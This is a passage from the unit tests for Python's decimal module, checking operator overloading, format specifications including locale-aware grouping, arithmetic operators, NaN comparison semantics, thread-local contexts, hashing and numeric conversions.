self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
